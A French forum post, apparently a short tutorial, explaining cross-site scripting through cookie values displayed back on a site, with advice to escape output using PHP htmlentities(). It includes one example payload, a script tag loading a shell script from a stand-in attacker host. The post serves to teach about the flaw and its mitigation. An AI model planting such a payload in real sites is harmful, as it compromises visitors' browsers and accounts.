Annonce

Réduire
Aucune annonce.

Cookie Site Scripting : le danger du stockage abusif dans les cookies

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Tutoriel Cookie Site Scripting : le danger du stockage abusif dans les cookies

    Salutation !

    Bon à la vue du titre vous devez surement vous dire ceci :
    Le Cookie Site Scripting ?! Mais qu'est ce donc ?

    Et bien j'ai découvert cette faille il y a peu de temps.
    Bien que cette faille soit peu rependue son exploitation est simple, il s'agit tout bêtement d'un Cross Site Scripting mais via les cookies !
    Je m'explique : imaginons qu'un site, par exemple désire stocker sur votre machine (via un cookie) un message qui s'affichera à votre connexion au site ...
    Prenons un exemple simple : "Bienvenue [PSEUDO] !"
    Vous voyez où je veux en venir ?
    Un utilisateur malveillant pourrait réécrire le cookie et y placer un code malveillant : "<script type="text/javascript" src="www.pirate.com/shell.js"></script>"
    Et hop le tour est joué le pirate vient d'inclure son shell ou pire encore !

    Donc évitez de stocker n'importe quoi dans vos cookies, ou alors dans ce cas utilisé par exemple la fonction PHP htmlentities() !

    HexaHacker
Chargement...
X